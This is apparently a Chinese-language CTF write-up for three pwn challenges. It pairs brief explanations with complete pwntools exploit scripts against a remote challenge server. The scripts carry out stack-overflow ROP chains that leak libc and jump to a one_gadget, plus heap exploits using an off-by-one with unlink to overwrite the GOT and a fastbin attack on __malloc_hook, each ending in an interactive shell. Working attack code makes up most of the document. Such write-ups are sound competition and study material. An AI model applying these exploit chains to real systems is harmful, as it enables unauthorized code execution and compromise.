1024_happy_stack 发现程序存在gets函数,'36D'+'\x00'绕过strcmp,然后溢出覆盖返回地址,首先泄露libc,然后同样得方法,利用one_gadget来getshell。一开始用system函数,发现一直出错,最后直接不管了,one_gadget一把梭。提交完群里师傅说可以多加一个ret,进行栈对齐,学到了,学到了。
exp如下: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 #! /usr/bin/env python from pwn import * from LibcSearcher import * #sh=process('./pwn1') sh=remote('111.231.70.44',28018) elf=ELF('./pwn1') libc=ELF('./libc6_2.27-3ubuntu1_amd64.so') context.log_level='debug' puts_plt = elf.plt['puts'] puts_got=elf.got['puts'] main_addr = 0x00000000004005A0 pop_rdi_ret=0x0000000000400803 pop_rsi_r15_ret=0x0000000000400801 payload ='36D'+'\x00'+'a'*0x384 payload+=p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr) sh.sendline(payload) sh.recvuntil('36D\n') puts_addr=u64(sh.recv(6).ljust(8,'\x00')) sh.success('puts_addr : ' +hex(puts_addr)) libc_base = puts_addr-libc.symbols['puts'] sh.success('libc_base : ' +hex(libc_base)) one_gadget=libc_base+0x4f2c5 payload ='36D'+'\x00'+'\x00'*0x384 payload+=p64(one_gadget) sleep(0.5) sh.sendline(payload) sh.interactive()
1024_happy_checkin 和第一个题一样,one_gadget一把梭。
exp如下: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 #! /usr/bin/env python from pwn import * from LibcSearcher import * #sh=process('./pwn2') sh=remote('111.231.70.44',28028) elf=ELF('./pwn2') libc=ELF('./libc6_2.27-3ubuntu1_amd64.so') context.log_level='debug' puts_plt = elf.plt['puts'] puts_got=elf.got['puts'] main_addr = 0x00000000004005F7 pop_rdi_ret=0x00000000004006e3 payload ='a'*0x370+'b'*0x8 payload+=p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr) sh.sendline(payload) sh.recvuntil('b'*8) puts_addr=u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00')) sh.success('puts_addr : ' +hex(puts_addr)) libc_base=puts_addr-libc.symbols['puts'] one_gadget=libc_base+0x4f2c5 payload ='a'*0x370+'a'*8 payload+=p64(one_gadget) sleep(0.5) sh.sendline(payload) sh.interactive()
1024_happy_unlink 程序存在off by one 漏洞,伪造fake_chunk,触发unlink,然后修改chunk_ptr为got地址,通过show函数泄露libc,修改free_got为system_addr,再次free就会getshell。需要注意得是,在做题的时候,我用题目给得libc,远程一直打不通,最后根据泄露得got地址,网上查了相应libc才得以打通,感觉是不是libc有问题。。。。
exp如下: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 #! /usr/bin/env python from pwn import * #sh=process('./pwn3') sh=remote('111.231.70.44',28048) elf=ELF('./pwn3') context.log_level='debug' #libc=ELF('./libc.so.6') def add(index,size): sh.recvuntil(': ') sh.sendline('1') sh.recvuntil('idx: ') sh.sendline(str(index)) sh.recvuntil(': ') sh.sendline(str(size)) def free(index): sh.recvuntil(': ') sh.sendline('2') sh.recvuntil('idx: ') sh.sendline(str(index)) def show(index): sh.recvuntil(': ') sh.sendline('3') sh.recvuntil('idx: ') sh.sendline(str(index)) def edit(index,content): sh.recvuntil(': ') sh.sendline('4') sh.recvuntil('idx: ') sh.sendline(str(index)) sh.recvuntil(': ') sh.send(content) chunk_ptr=0x6020f0 fd=chunk_ptr-0x18 bk=chunk_ptr-0x10 free_got=elf.got['free'] puts_got=elf.got['puts'] puts_plt=elf.plt['puts'] add(0,0x60) add(1,0x88) add(2,0x80) add(3,'/bin/sh\x00') edit(1,p64(0)+p64(0x81)+p64(fd)+p64(bk)+'a'*0x60+p64(0x80)+'\x90') free(2) edit(1,'a'*0x8+p64(free_got)+p64(puts_got)) show(0) free_addr=u64(sh.recv(6).ljust(8,'\x00')) sh.success('free_addr : ' +hex(free_addr)) libc_base=free_addr-0x0844f0 sh.success('libc_base : ' +hex(libc_base)) system_addr=libc_base+0x045390 sh.success('system_addr : ' +hex(system_addr)) edit(0,p64(system_addr)) edit(3,'/bin/sh\x00') free(3) #gdb.attach(sh) sh.interactive()
这里我还用了另一种方法,非预期???
通过off by one 漏洞修改 chunk_size,照成堆重叠,然后泄露libc,之后将chunk申请到malloc_hook,利用one_gadget来getshell。
exp如下: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 #! /usr/bin/env python from pwn import * #sh=process('./pwn3') sh=remote('111.231.70.44',28016) elf=ELF('./pwn3') context.log_level='debug' libc=ELF('./libc6_2.23-0ubuntu10_amd64.so') def add(index,size): sh.recvuntil(': ') sh.sendline('1') sh.recvuntil('idx: ') sh.sendline(str(index)) sh.recvuntil(': ') sh.sendline(str(size)) def free(index): sh.recvuntil(': ') sh.sendline('2') sh.recvuntil('idx: ') sh.sendline(str(index)) def show(index): sh.recvuntil(': ') sh.sendline('3') sh.recvuntil('idx: ') sh.sendline(str(index)) def edit(index,content): sh.recvuntil(': ') sh.sendline('4') sh.recvuntil('idx: ') sh.sendline(str(index)) sh.recvuntil(': ') sh.send(content) add(0,0x18) add(1,0x60) add(2,0x60) add(3,0x10) edit(0,'a'*0x18+'\xe1') free(1) add(4,0x60) show(2) main_arena=u64(sh.recv(6).ljust(8,'\x00'))-88 sh.success('main_arena : ' +hex(main_arena)) libc_base=main_arena-0x3c4b20 sh.success('libc_base : ' +hex(libc_base)) malloc_hook=libc_base+libc.symbols['__malloc_hook'] sh.success('malloc_hook : ' +hex(malloc_hook)) one_gadget=libc_base+0xf1147 realloc=libc_base+libc.symbols['realloc'] add(5,0x60) free(5) edit(2,p64(malloc_hook-0x23)) add(6,0x60) add(7,0x60) edit(7,'a'*3+p64(0)*2+p64(one_gadget)) sh.recvuntil(': ') sh.sendline('1') sh.recvuntil('idx: ') sh.sendline(str(1)) sh.recvuntil(': ') sh.sendline(str(0x20)) #gdb.attach(sh) sh.interactive()
